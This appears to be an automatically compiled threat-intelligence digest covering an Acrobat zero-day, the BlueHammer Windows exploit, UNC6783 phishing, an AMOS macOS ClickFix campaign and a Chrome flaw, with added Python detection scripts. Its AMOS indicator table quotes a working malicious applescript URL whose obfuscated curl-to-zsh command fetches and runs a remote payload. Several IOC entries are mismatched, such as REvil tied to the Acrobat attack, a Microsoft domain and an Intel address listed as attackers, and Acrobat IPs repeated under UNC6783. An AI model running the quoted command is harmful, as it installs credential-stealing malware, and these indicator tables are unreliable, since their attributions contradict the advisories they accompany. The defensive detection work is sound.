Acrobat Reader Zero-Day Exploited in the Wild for Many Months
A zero-day vulnerability in Adobe Acrobat Reader has been actively exploited since November 2025, and potentially earlier, as discovered by security researcher Haifei Li through the EXPMON system. Malicious PDF files deliver an obfuscated JavaScript payload that collects system information, including language settings, OS version, Adobe Reader version, and the PDF's local path, transmitting this data to attacker-controlled remote servers (169.40.2.68 and 188.214.34.20). This script is capable of delivering additional remote code execution or sandbox escape exploits, though during analysis, the server did not provide an exploit, suggesting an advanced fingerprinting attack. Malware researcher Giuseppe Massaro noted that the exploit-carrying PDFs display Russian-language decoys related to gas supply disruptions, indicating a targeting focus on Russian-speaking entities within government, energy, or infrastructure sectors. The vulnerability affects the latest Acrobat Reader version, and while Adobe has been notified, a fix is not yet available. Until a patch is released, users should avoid opening untrusted PDF files, and security teams are advised to block the identified attacker IP addresses, filter HTTP/HTTPS traffic containing the "Adobe Synchronizer" User Agent string, and monitor for "AdobeCollabSync.exe" making external network connections or PDF JavaScript calling "RSS.addFeed()" or "util.readFileIntoStream()" APIs.
Severity: Critical
Threat Details and IOCs
| Malware: | GandCrab, REvil, Sodin, Sodinokibi |
|---|---|
| Technologies: | Adobe Acrobat, Apple macOS, Microsoft Windows |
| Attacker IPs: | 169[.]40[.]2[.]68, 188[.]214[.]34[.]20 |
| Attacker Hashes: | 54077a5b15638e354fa02318623775b7a1cc0e8c21e59bcbab333035369e377f, 65dca34b04416f9a113f09718cbe51e11fd58e7287b7863e37f393ed4d25dde7 |
| Victim Industries: | Civil Infrastructure, Energy, Government, Oil & Gas |
| Victim Countries: | Russia, United States |
Mitigation Advice
- Add the IP addresses 169.40.2.68 and 188.214.34.20 to the network firewall and web proxy blocklists.
- Create a rule on the web proxy or network firewall to block all outbound HTTP/HTTPS requests containing the User-Agent string 'Adobe Synchronizer'.
- Create a detection rule in your Endpoint Detection and Response (EDR) or Security Information and Event Management (SIEM) system to alert when the process 'AdobeCollabSync.exe' initiates an outbound network connection.
- Configure endpoint security tools or automated malware analysis sandboxes to detect and alert on PDF files that execute JavaScript containing the 'RSS.addFeed()' or 'util.readFileIntoStream()' API calls.
- Monitor Adobe security bulletins for a patch addressing the zero-day vulnerability and prepare for immediate, prioritized deployment to all systems with Adobe Acrobat Reader once it is released.
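As an added example (not code from the advisory or from EXPMON), the two detection items above expressed as Python checks over constructed data: a proxy-log matcher for the attacker IPs and the "Adobe Synchronizer" User-Agent, and a PDF scanner for the two JavaScript APIs that also inflates FlateDecode streams so script hidden in compressed objects is not missed. The proxy log layout, the minimal PDF-like byte string and the function names are assumptions.

```python
import re
import zlib

# Indicators from the advisory above.
BLOCKED_IPS = {"169.40.2.68", "188.214.34.20"}
SUSPECT_UA = "adobe synchronizer"
SUSPECT_JS_APIS = ("RSS.addFeed(", "util.readFileIntoStream(")

# Assumed proxy log layout (constructed for this example):
#   <timestamp> <client-ip> <dest-ip> <method> <url> "<user-agent>"
LOG_RE = re.compile(r'^(?P<ts>\S+) (?P<src>\S+) (?P<dst>\S+) (?P<method>\S+) '
                    r'(?P<url>\S+) "(?P<ua>[^"]*)"$')

def check_proxy_line(line):
    """Return the reasons a proxy log line matches the advisory's network indicators."""
    m = LOG_RE.match(line.strip())
    if not m:
        return ["unparseable line"]
    reasons = []
    if m["dst"] in BLOCKED_IPS:
        reasons.append("destination is a listed attacker IP")
    if SUSPECT_UA in m["ua"].lower():
        # Baseline this UA's normal destinations before enforcing a block: Acrobat's
        # own synchroniser (AdobeCollabSync.exe) sends it to Adobe services too.
        reasons.append("Adobe Synchronizer user agent")
    return reasons

STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)

def pdf_js_indicators(pdf_bytes):
    """Return the suspect JavaScript API names found in a PDF (sorted, de-duplicated).

    FlateDecode streams are inflated; other filters (LZW, ASCIIHex, ...) and
    hex-escaped PDF strings are not handled, so treat a miss as inconclusive.
    """
    views = [pdf_bytes]
    for m in STREAM_RE.finditer(pdf_bytes):
        try:
            views.append(zlib.decompress(m.group(1)))
        except zlib.error:
            pass  # not zlib data (or damaged); the raw bytes are searched anyway
    found = {api for data in views for api in SUSPECT_JS_APIS if api.encode() in data}
    return sorted(found)

def build_sample_pdf(js):
    """Constructed PDF-like bytes carrying `js` in a FlateDecode stream (not a valid PDF)."""
    body = zlib.compress(js.encode())
    header = b"%PDF-1.7\n1 0 obj\n<< /S /JavaScript /JS 2 0 R >>\nendobj\n"
    obj = b"2 0 obj\n<< /Filter /FlateDecode /Length " + str(len(body)).encode() + b" >>\nstream\n"
    return header + obj + body + b"\nendstream\nendobj\n%%EOF\n"

# Constructed sample data for a stand-alone run.
SAMPLE_LOG = [
    '2026-04-08T10:01:02Z 10.0.0.5 188.214.34.20 POST http://188.214.34.20/ "Adobe Synchronizer"',
    '2026-04-08T10:01:03Z 10.0.0.6 93.184.216.34 GET https://www.example.com/ "Mozilla/5.0"',
]
SAMPLE_PDF = build_sample_pdf('RSS.addFeed("http://example.invalid/feed");')
CLEAN_PDF = build_sample_pdf('app.alert("hello");')

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(check_proxy_line(line))
    print(pdf_js_indicators(SAMPLE_PDF), pdf_js_indicators(CLEAN_PDF))
```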
Compliance Best Practices
- Develop and implement a recurring security awareness training program that specifically educates users on the dangers of opening unsolicited attachments, including PDF files, from unknown or untrusted sources.
- Implement a policy to disable JavaScript execution in Adobe Acrobat Reader across all endpoints through Group Policy (GPO) or a similar endpoint configuration management tool.
- Implement a network egress filtering policy that denies all outbound traffic by default and only allows connections to approved services and destinations required for business operations.
- Deploy an automated sandboxing solution for email attachments and web downloads to analyze suspicious files, such as PDFs, in an isolated environment to detect and block malicious behavior before it reaches an endpoint.
- Enhance Endpoint Detection and Response (EDR) policies to detect and alert on anomalous behavior from common document applications like Adobe Acrobat Reader, such as spawning unexpected processes or making network connections to unusual domains.
BlueHammer: Windows Zero-Day Exploit Leaked
A proof-of-concept (PoC) exploit for an unpatched Windows local privilege escalation vulnerability, dubbed BlueHammer, has been publicly released on GitHub by "Chaotic Eclipse and Nightmare Eclipse," affecting patched Windows 10, 11, and Windows Server systems. This zero-day allows a low-privileged user to escalate to NT AUTHORITY\SYSTEM or administrator by chaining legitimate Windows features: it forces Microsoft Defender to create a Volume Shadow Copy, pauses Defender, accesses sensitive registry hive files from the snapshot to extract NTLM password hashes, changes a local Administrator's password, duplicates the security token to achieve SYSTEM integrity, and creates a malicious temporary Windows Service, ultimately restoring the original password hash. While Microsoft's current Defender signature for the exploit is easily bypassed, organizations should implement behavioral detection by monitoring for Volume Shadow Copy enumeration from user-space processes, unexpected Cloud Files sync root registrations, low-privileged accounts spawning Windows services, and rapid Administrator password changes and restorations. Enforcing least privilege and restricting user account interaction with Cloud Files APIs and VSS interfaces are also critical, as the exploit requires local access and is highly susceptible to rapid weaponization by threat actors.
Severity: Critical
Threat Details and IOCs
| Malware: | BPFdoor, BPFDoor |
|---|---|
| Technologies: | Microsoft Defender Antivirus, Microsoft Windows |
| Attacker Domains: | go[.]microsoft[.]com |
| Attacker URLs: | hxxps[://]github[.]com/Nightmare-Eclipse/BlueHammer, hxxps[://]go[.]microsoft[.]com/fwlink/?LinkID=121721&arch=x64 |
| Attacker Hashes: | 5f9ee4e52da38191c3fdf2da567cc903, 6e1e9fa0334d8f1f5d0e3a160ba65441f0656d1f1c99f8a9f1ae4b1b1bf7d788, c6baa5ec9ea2c2802a90acad5a53453d176a02e04a31ac8e9b7b34b5e3329b84, c885f1e77f08428cc628d9cb86cf4a10c09dd3b1 |
| Victim Industries: | Consumer Packaged Goods, Hospitality, Information Technology, Retail, Transportation, Travel, Utilities |
| Victim Countries: | United States |
Mitigation Advice
- Create a detection rule in your SIEM or EDR to alert on the execution of Volume Shadow Copy tools (e.g., vssadmin.exe) by non-administrative user accounts.
- Implement a SIEM or EDR detection rule to alert on the creation of a new Windows Service (Event ID 4697 or 7045) by any account that is not a pre-approved administrator or system account.
- Configure endpoint monitoring to detect and alert on the registration of new Cloud Files sync roots, particularly when initiated by standard user processes.
- Create a correlation rule in your SIEM to alert when a local administrator password change (Event ID 4723) is followed by another password change for the same account within a short time window (e.g., 5 minutes).
Compliance Best Practices
- Initiate a project to audit and remove all unnecessary local administrator privileges from standard user accounts across the enterprise.
- Use Group Policy Objects (GPO) or another endpoint configuration management tool to restrict standard user accounts from executing Volume Shadow Copy Service (VSS) administration tools and accessing VSS APIs.
- Implement an application control solution, such as Windows Defender Application Control or AppLocker, to restrict the execution of unauthorized applications and scripts from user-writable locations.
- Investigate and implement technical controls to restrict standard user accounts from interacting with the Windows Cloud Files API where it is not required for business functions.
https://cyberpress.org/releases-windows-defender-0-day/
https://gbhackers.com/windows-defender-0-day-published-online/
https://securityonline.info/bluehammer-windows-defender-0-day-lpe-exploit/
https://www.helpnetsecurity.com/2026/04/08/bluehammer-windows-zero-day-exploit-leaked/
'Several Dozen' High-Value Corporations Hit by New Extortion Crew in Helpdesk Phishing Spree
A new extortion crew, tracked by Google Threat Intelligence Group as UNC6783, has targeted "several dozen high-value" corporations using sophisticated phishing and helpdesk social-engineering techniques. This financially motivated group compromises call centers and Business Process Outsourcers (BPOs) to leverage stolen employee credentials for access to customer IT environments. They also directly target corporate support and helpdesk staff through live chat, directing them to malicious, spoofed Okta login pages, often using domain patterns such as `<org>[.]zendesk-support<##>[.]com`. UNC6783 employs a phishing kit to bypass multi-factor authentication by stealing clipboard contents and enrolling their own devices for persistent access, and they distribute remote access malware via fake security software updates. Following data exfiltration, ransom notes are delivered using Proton Mail accounts. There is a potential link between UNC6783 and the "Mr. Raccoon" persona, who claimed responsibility for a recent breach of Adobe through an Indian BPO, reportedly compromising 13 million support tickets, 15,000 employee records, and other sensitive internal documents.
Severity: Critical
Threat Details and IOCs
| Malware: | Mohazo, Raccoon, Raccoon Stealer, Racealer, RecordBreaker |
|---|---|
| Technologies: | Adobe, Adobe Acrobat, Microsoft Windows, Okta, Zendesk |
| Threat Actors: | LAPSUS$, MrRaccoon, ScatteredSpider, ShinyHunters, UNC6783 |
| Attacker Countries: | Russia, Ukraine |
| Attacker Domains: | [.]zendesk-support[.]com, [.]zendesk-support<##>[.]com, zendesk-support[.]com |
| Victim Industries: | Business Process Outsourcing, Media and Entertainment, Professional Services, Technology Hardware |
| Victim Countries: | India, United States |
Mitigation Advice
- Configure the corporate web filter and DNS sinkhole to block any domains matching the pattern `*zendesk-support*.com` that are not explicitly authorized.
- Conduct an immediate security briefing for all helpdesk, support staff, and employees of BPO partners to warn them of the active social engineering campaign using live chat to direct users to fake Okta login pages.
- Query identity provider (e.g., Okta) and SIEM logs for instances of a user account successfully authenticating from a new or anomalous location, immediately followed by the enrollment of a new multi-factor authentication (MFA) device.
- Add the IP addresses 169.40.2.68 and 188.214.34.20 to the network firewall's deny list.
- Create a rule in the web proxy to block all outbound HTTP/HTTPS requests containing the User-Agent string 'Adobe Synchronizer'.
- Use Group Policy (GPO) or an endpoint management system to deploy a configuration change that disables JavaScript execution in all corporate installations of Adobe Reader.
Compliance Best Practices
- Initiate a project to migrate all user accounts, especially for privileged and helpdesk roles, from phishable MFA methods (like SMS and push notifications) to phishing-resistant MFA, such as FIDO2-compliant hardware security keys.
- Establish a formal third-party risk management program to review the security posture of all BPOs and vendors, enforce principles of least privilege for their accounts, and include security requirements in all contracts.
- Deploy an application whitelisting or application control solution on endpoints to restrict software execution to only approved applications, preventing the launch of unauthorized remote access tools.
- Enhance the security awareness training program to include recurring, interactive modules focused on identifying sophisticated social engineering, MFA bypass attacks, and business process compromise scenarios.
- Implement network segmentation to create isolated enclaves for third-party and BPO access, strictly limiting their connectivity to only the specific hosts and services required for their duties.
- Develop and tune a high-fidelity automated alert in the SIEM that triggers when a new MFA device is enrolled for a user account within a short time window following a login from a high-risk or anomalous source (e.g., new country, unfamiliar ASN).
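Both the BlueHammer correlation rule (a password change followed by another for the same account within five minutes) and the rule above (a new MFA device enrolled shortly after an anomalous login) are the same pattern: event A followed by event B for the same key inside a time window. As an added example, not code from any of the cited sources, one small correlator in Python serves both, run over constructed events; the event field names, the Okta-style event type strings and the 30-minute MFA window are assumptions.

```python
from datetime import datetime, timedelta

def parse_ts(s):
    """ISO-8601 timestamps; a trailing Z is accepted as UTC."""
    return datetime.fromisoformat(s.replace("Z", "+00:00"))

def correlate(events, first, second, key, window):
    """Return (first_event, second_event) pairs where an event matching `second` occurs
    within `window` after an event matching `first` for the same `key`. `events` must
    be time-ordered; an event is never paired with itself."""
    pending = {}  # key -> first-stage events still inside the window
    pairs = []
    for e in events:
        k, t = key(e), parse_ts(e["ts"])
        live = [p for p in pending.get(k, []) if t - parse_ts(p["ts"]) <= window]
        if second(e):
            pairs.extend((p, e) for p in live)
        if first(e):
            live.append(e)
        pending[k] = live
    return pairs

# BlueHammer rule: two password-change events (Event ID 4723) for the same account
# within five minutes, matching the change-then-restore sequence.
def password_flip_alerts(events):
    is_4723 = lambda e: e["event"] == "4723"
    return correlate(events, is_4723, is_4723, lambda e: e["user"], timedelta(minutes=5))

# UNC6783 rule: a login from a country outside the user's baseline, followed within
# 30 minutes (assumed window) by MFA factor enrollment. Event type names follow
# Okta's System Log (assumption; adjust for other identity providers).
def mfa_after_anomalous_login(events, baseline):
    def risky_login(e):
        return (e["event"] == "user.session.start"
                and e.get("country") not in baseline.get(e["user"], ()))
    def enrollment(e):
        return e["event"] == "user.mfa.factor.activate"
    return correlate(events, risky_login, enrollment, lambda e: e["user"], timedelta(minutes=30))

# Constructed sample events (not real log data).
WINDOWS_EVENTS = [
    {"ts": "2026-04-08T09:00:00Z", "event": "4723", "user": "Administrator"},
    {"ts": "2026-04-08T09:00:40Z", "event": "4723", "user": "Administrator"},
    {"ts": "2026-04-08T12:00:00Z", "event": "4723", "user": "jdoe"},  # lone change: no alert
]
IDP_EVENTS = [
    {"ts": "2026-04-09T14:00:00Z", "event": "user.session.start", "user": "a.lee", "country": "BR"},
    {"ts": "2026-04-09T14:06:00Z", "event": "user.mfa.factor.activate", "user": "a.lee"},
    {"ts": "2026-04-09T15:00:00Z", "event": "user.session.start", "user": "b.kim", "country": "US"},
    {"ts": "2026-04-09T15:02:00Z", "event": "user.mfa.factor.activate", "user": "b.kim"},  # in baseline
]
BASELINE = {"a.lee": {"US"}, "b.kim": {"US"}}

if __name__ == "__main__":
    print(password_flip_alerts(WINDOWS_EVENTS))
    print(mfa_after_anomalous_login(IDP_EVENTS, BASELINE))
```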
https://dataconomy.com/2026/04/09/google-warns-unc6783-is-targeting-bpo-firms-for-wider-breaches/
https://thecyberexpress.com/unc6783-bpo-providers-as-cyberattack-gateways/
https://www.hendryadrian.com/google-new-unc6783-hackers-steal-corporate-zendesk-support-tickets/
https://www.infosecurity-magazine.com/news/google-warns-group-targeting-bpos/
https://www.theregister.com/2026/04/09/several_dozen_highvalue_corporations_targeted/
New macOS Atomic Stealer Campaign Uses Script Editor in ClickFix Attack
A new campaign targets macOS users with Atomic Stealer (AMOS) malware, leveraging a variation of the ClickFix attack that abuses the built-in Script Editor application. Observed by security researchers at Jamf, this method involves luring victims to fake Apple-themed websites that offer disk space cleanup guides. These malicious pages utilize the `applescript://` URL scheme to automatically launch Script Editor with pre-filled, obfuscated code. This code executes a `curl | zsh` command, which downloads and runs a script directly in system memory. The script then decodes a base64 + gzip payload, downloads a Mach-O binary to `/tmp/helper`, removes its security attributes, makes it executable, and runs it. This final payload is the Atomic Stealer, a commodity malware-as-a-service known for targeting sensitive data such as Keychain information, desktop files, browser cryptocurrency wallet extensions, autofill data, passwords, cookies, stored credit cards, and system information. This technique effectively bypasses macOS Tahoe 26.4's protections against ClickFix attacks by avoiding direct Terminal interaction. AMOS also incorporated a backdoor component last year for persistent access. Mac users are advised to treat Script Editor prompts as high-risk and to rely solely on official Apple documentation for troubleshooting.
Severity: Critical
Threat Details and IOCs
| Malware: | AMOS, Atomic macOS Stealer, Atomic Stealer, OSX/Amos, SHAMOS |
|---|---|
| Technologies: | Apple macOS, Electron, Ledger Live, Node.js |
| Attacker Countries: | Iran, North Korea, Russia |
| Attacker Domains: | cleanupmac[.]mssg[.]me, dryvecar[.]com, main[.]mon2gate[.]net, storage-fixes[.]squarespace[.]com |
| Attacker URLs: | applescript[:]//com.apple.scripteditor?action=new&script=--%20macOS%20Storage%20Optimization%0D--%20System%20Maintenance%20Module%20v3.2%0D--%20Copyright%202026%20Apple%20Inc.%20All%20rights%20reserved.%0D%0D--%20This%20utility%20scans%20and%20removes%3A%0D--%20%20%20Temporary%20system%20caches%0D--%20%20%20Stale%20application%20data%0D--%20%20%20Old%20diagnostic%20logs%20and%20crash%20reports%0D--%20%20%20Unused%20language%20resources%0D%0Ddo%20shell%20script%20%22curl%20-SfsLk%20%24(echo%20'muulrd..oc2e9fscaf8%3A.f5c7.3vo0tovvstb643hhp314p9pt696p0o96of1sotp6svyb1bbyf3hos0o6t%2F039ttv'%7Ctr%20'a.%2Fp16th40y3dsvfo9bm7%3A8lcru5e2'%20'.%2F0123456789%3Aabcdefhlmoprstuvy')%7C%20zsh%22%0Ddisplay%20dialog%20%22Storage%20cleanup%20completed%20successfully.%22%20%26%20return%20%26%20return%20%26%20%22Freed%20approximately%2024.7%20GB%20of%20disk%20space.%22%20buttons%20%7B%22OK%22%7D%20default%20button%20%22OK%22%20with%20title%20%22macOS%20Storage%20Optimization%22%20with%20icon%20note, hxxps[://]cleanupmac[.]mssg[.]me/?gad_source=1&gad_campaignid=23708793071&gbraid=0AAAABBS8jKrbkIiVdpqodGRoYiYNaByHP&gclid=EAIaIQobChMI2uaJ-_TJkwMVpqJQBh1N6yRoEAAYBCAAEgLXrfD_BwE, hxxps[://]dryvecar[.]com/cleaner3/update, hxxps[://]dryvecar[.]com/curl/04566d1d3f9717b2e7e6b643775d9ca72cef942f6df9ce075cf8c73a1bd2565a, hxxps[://]main[.]mon2gate[.]net/modules/wallets, hxxps[://]storage-fixes[.]squarespace[.]com/?gad_source=1 |
| Attacker Hashes: | 3d3c91ee762668c85b74859e4d09a2adfd34841694493b82659fda77fe0c2c44, eeb14ff7262367f891168268ca8d64a306968e579be1136cbd7a48107698f405 |
| Victim Industries: | Accounting, Automotive, Cryptocurrency, Education, Energy, Financial Services, Government, Healthcare, Hospitality, Information Technology, Interior Design, Legal Services, Mining, Real Estate, Retail, Technology Hardware, Telecommunications, Transportation |
| Victim Countries: | Belgium, Canada, China, Colombia, France, India, Iran, Israel, Italy, Japan, Mexico, North Korea, Russia, United Kingdom, United States |
Mitigation Advice
- Configure your Endpoint Detection and Response (EDR) tool to generate a high-severity alert for any process execution of `Script Editor` that spawns a shell process (like `zsh` or `bash`) which then initiates a network connection using `curl` or `wget`.
- Create a detection rule in your EDR or SIEM to alert on the sequence of a file being created in the `/tmp` directory, followed by the execution of `xattr -c` on that file, and its subsequent execution.
- Immediately issue a security advisory to all employees, especially macOS users, warning them not to approve any browser prompts to open 'Script Editor' and to be suspicious of websites offering system cleanup guides that are not from official Apple sources.
- Investigate and implement controls through your web proxy or browser management policies to block or alert on the use of the `applescript://` URL scheme initiated from external websites.
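As an added example (not code from Jamf's report or from this page), the first two EDR rules above as Python detection logic run over constructed process telemetry: a Script Editor -> shell -> curl/wget ancestry check, and a /tmp file-create -> xattr -> execute sequence check. The telemetry shape, field names and function names are assumptions; the sample also includes a Terminal-driven curl that must not alert.

```python
import os

SHELLS = {"zsh", "bash", "sh"}
DOWNLOADERS = {"curl", "wget"}
SCRIPT_EDITOR = "Script Editor"   # basename of Script Editor.app's executable

def ancestry(procs, pid):
    """Executable basenames from `pid` up to the root: [self, parent, grandparent, ...]."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(os.path.basename(procs[pid]["exe"]))
        pid = procs[pid]["ppid"]
    return chain

def clickfix_chain_alerts(events):
    """curl/wget processes that descend from Script Editor through a shell."""
    procs = {e["pid"]: e for e in events if e["type"] == "exec"}
    alerts = []
    for pid in procs:
        chain = ancestry(procs, pid)
        if chain[0] not in DOWNLOADERS or SCRIPT_EDITOR not in chain:
            continue
        between = chain[1:chain.index(SCRIPT_EDITOR)]
        if any(name in SHELLS for name in between):
            alerts.append((pid, " <- ".join(chain)))
    return alerts

def tmp_drop_and_run_alerts(events):
    """Files created under /tmp whose attributes are cleared and which then execute.
    `events` must be time-ordered."""
    created, cleared, alerts = set(), set(), []
    for e in events:
        if e["type"] == "file_create" and e["path"].startswith("/tmp/"):
            created.add(e["path"])
        elif e["type"] == "exec":
            args = e.get("args", [])
            # `xattr -c FILE` clears every attribute; `xattr -d com.apple.quarantine FILE`
            # strips only the quarantine flag. Either stops Gatekeeper assessing the file.
            if os.path.basename(e["exe"]) == "xattr" and ("-c" in args or "com.apple.quarantine" in args):
                cleared.update(a for a in args if a in created)
            elif e["exe"] in cleared:
                alerts.append(e["exe"])
    return alerts

# Constructed process telemetry reproducing the chain described above (the download
# URL is a placeholder), plus a benign Terminal-driven curl.
SAMPLE = [
    {"type": "exec", "pid": 100, "ppid": 1, "exe": "/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor"},
    {"type": "exec", "pid": 101, "ppid": 100, "exe": "/bin/zsh", "args": ["zsh"]},
    {"type": "exec", "pid": 102, "ppid": 101, "exe": "/usr/bin/curl", "args": ["curl", "-SfsLk", "<placeholder-url>"]},
    {"type": "file_create", "pid": 101, "path": "/tmp/helper"},
    {"type": "exec", "pid": 104, "ppid": 101, "exe": "/usr/bin/xattr", "args": ["xattr", "-c", "/tmp/helper"]},
    {"type": "exec", "pid": 105, "ppid": 101, "exe": "/tmp/helper", "args": ["/tmp/helper"]},
    {"type": "exec", "pid": 200, "ppid": 1, "exe": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"},
    {"type": "exec", "pid": 201, "ppid": 200, "exe": "/bin/zsh", "args": ["zsh"]},
    {"type": "exec", "pid": 202, "ppid": 201, "exe": "/usr/bin/curl", "args": ["curl", "https://example.com/"]},
]

if __name__ == "__main__":
    print(clickfix_chain_alerts(SAMPLE))
    print(tmp_drop_and_run_alerts(SAMPLE))
```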
Compliance Best Practices
- Develop and deploy an application control or allowlisting policy for macOS endpoints to prevent the execution of unauthorized applications and scripts, particularly from temporary or user-writable directories like `/tmp`.
- Update the security awareness training program to include specific modules on social engineering attacks targeting macOS, demonstrating how attackers abuse trusted system utilities like Script Editor through malicious web links and copy-paste commands.
- For non-developer user groups, create and enforce a configuration policy using a Mobile Device Management (MDM) solution to restrict or disable user access to developer tools and scripting environments, including Script Editor.
- Conduct a comprehensive review of user account privileges on macOS endpoints, ensuring that standard users do not have administrative rights and cannot install software or execute scripts that modify system-level files and settings.
Google Chrome - CVE-2026-5858
A heap-based buffer overflow vulnerability, identified as CVE-2026-5858, exists within the WebML component of Google Chrome. This flaw, rated with a CVSS v3.1 score of 8.8, stems from the WebML implementation's failure to validate memory boundaries when processing operations triggered by a specially crafted HTML page. An attacker can exploit this vulnerability remotely with low complexity and no required privileges, though user interaction (visiting a malicious page) is necessary, to achieve arbitrary code execution within the renderer process and potentially gain privileged rights. While not actively exploited, a patch is available, and affected versions include Google Chrome prior to 147.0.7727.55 on Linux and prior to 147.0.7727.55/56 on Windows/Mac. Resolution requires updating Google Chrome to version 147.0.7727.55 or higher for Linux, and 147.0.7727.55/56 or higher for Windows/Mac.
Severity: Critical
Threat Details and IOCs
| CVEs: | CVE-2026-5858, CVE-2026-5859, CVE-2026-5860, CVE-2026-5861, CVE-2026-5865, CVE-2026-5866, CVE-2026-5868, CVE-2026-5870, CVE-2026-5871, CVE-2026-5872, CVE-2026-5873 |
|---|---|
| Technologies: | Apple macOS, Google Chrome, Linux, Microsoft Windows |
| Attacker Emails: | ningxin[.]hu@intel[.]com |
| Attacker Hashes: | c6eed09fc8b174b0f3eebedcceb1e792 |
| Victim Industries: | Healthcare |
Mitigation Advice
- Force update all company-managed Windows and macOS devices to Google Chrome version 147.0.7727.56 or newer. Force update all company-managed Linux devices to Google Chrome version 147.0.7727.55 or newer.
- Use your endpoint management system to check for and enforce the latest security updates for Microsoft Edge on all company Windows and macOS devices.
- Use asset inventory tools to identify desktop applications built on the Electron framework and check with their respective vendors for security updates related to the underlying Chromium engine.
- Send a security bulletin to all employees advising them to be extra cautious with links from untrusted sources and to report any suspicious websites, as this vulnerability is triggered by visiting a malicious page.
- Scan all endpoints to identify and update or uninstall unmanaged Chromium-based browsers, such as Brave and Opera, to their latest versions.
Compliance Best Practices
- Implement or enhance an automated patch management solution to ensure timely deployment of security updates for all web browsers and third-party applications across all endpoints.
- Evaluate and pilot a Remote Browser Isolation (RBI) solution to render web content in a secure, remote container, preventing browser-based exploits from reaching corporate endpoints.
- Develop and implement an application allowlisting policy to restrict the execution of unauthorized software, reducing the attack surface from unmanaged or vulnerable applications.
- Enhance the ongoing security awareness training program with specific, recurring modules on identifying malicious links and the dangers of navigating to untrusted websites.